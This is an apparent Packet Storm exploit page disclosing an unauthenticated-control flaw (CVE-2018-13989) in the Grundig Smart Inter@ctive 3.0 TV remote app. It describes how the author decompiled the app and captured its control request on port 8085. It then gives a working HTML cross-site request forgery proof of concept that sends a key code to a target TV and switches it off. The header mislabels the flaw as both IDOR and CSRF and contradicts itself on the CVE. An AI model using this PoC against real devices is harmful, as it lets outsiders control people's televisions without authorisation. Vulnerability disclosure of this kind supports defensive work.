Twenty Year Anniversary

Grundig Smart Inter@ctive 3.0 Insecure Direct Object Reference

Grundig Smart Inter@ctive 3.0 Insecure Direct Object Reference
Posted Jul 9, 2018
Authored by Ahmethan Gultekin

Grundig Smart Inter@ctive version 3.0 suffers from an insecure direct object reference vulnerability.

tags | exploit
advisories | CVE-2018-13989
MD5 | 962b3362b63453f87e81101d6581d13d

Grundig Smart Inter@ctive 3.0 Insecure Direct Object Reference

Change Mirror Download
# Exploit Title: Grundig Smart Remote App CSRF
# Google Dork: Local Vulnerability
# Date: 06.07.2018
# Exploit Author: Ahmethan GALTEKAdegN ~ @inject0r16
# Vendor Homepage: https://www.grundig.com/
# Software Link: https://play.google.com/store/apps/details?id=arcelik.
android.grundig.remote
# Version: Grundig Smart Inter@ctive 3.0
# Tested on: Windows 7-8-10
# CVE : none

Hello! I'm trying my TV.I saw a Grundig remote control application on
Google Play.
Computer I downloaded and decompiled APK. And I began to examine individual
classes.
I noticed in a class that a request was sent during operations on the
command line.
I downloaded the phone packet viewer and opened the control application and
made some operations.
And I saw that there was such a request;

GET /sendrcpackage?keyid=-2547&keysymbol=-4078 HTTP/1.1

I noticed that each process has an id value. Then I turned off the
television using the control application and noted the outgoing IDs.
The only requirement for the connection between the TV and the application
was to have the same IP address.
After I made the IP address on the TV and the phone and the IP address on
the computer the same: I accessed the interface from the 8085 port.
Now I could do anything from the computer :)

CSRF POC :

<html>
<head>
<title>Grundig TV PoC</title>
</head>
<body>
<h1>Grundig Inter@ctive 3 Shutdown PoC</h1>
<form method="POST" action="http://TargetIP:8085/sendrcpackage?keyid=-2544&
keysymbol=-4081
<http://targetip:8085/sendrcpackage?keyid=-2544&keysymbol=-4081>">
<input type="submit" value="Go!">
</form>
</body>
</html>

this poc will turn off the television when it is running. :)

video about vulnerability;
https://youtu.be/H7WYTkgtwsY


#MoreThanYouImagine! ~ ahmeth4n.org

greetz : @SmashTheKernel , @t3beq , @c_c0re

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

September 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    1 Files
  • 2
    Sep 2nd
    3 Files
  • 3
    Sep 3rd
    15 Files
  • 4
    Sep 4th
    15 Files
  • 5
    Sep 5th
    18 Files
  • 6
    Sep 6th
    18 Files
  • 7
    Sep 7th
    15 Files
  • 8
    Sep 8th
    2 Files
  • 9
    Sep 9th
    2 Files
  • 10
    Sep 10th
    16 Files
  • 11
    Sep 11th
    17 Files
  • 12
    Sep 12th
    15 Files
  • 13
    Sep 13th
    29 Files
  • 14
    Sep 14th
    21 Files
  • 15
    Sep 15th
    3 Files
  • 16
    Sep 16th
    1 Files
  • 17
    Sep 17th
    15 Files
  • 18
    Sep 18th
    16 Files
  • 19
    Sep 19th
    29 Files
  • 20
    Sep 20th
    18 Files
  • 21
    Sep 21st
    5 Files
  • 22
    Sep 22nd
    2 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close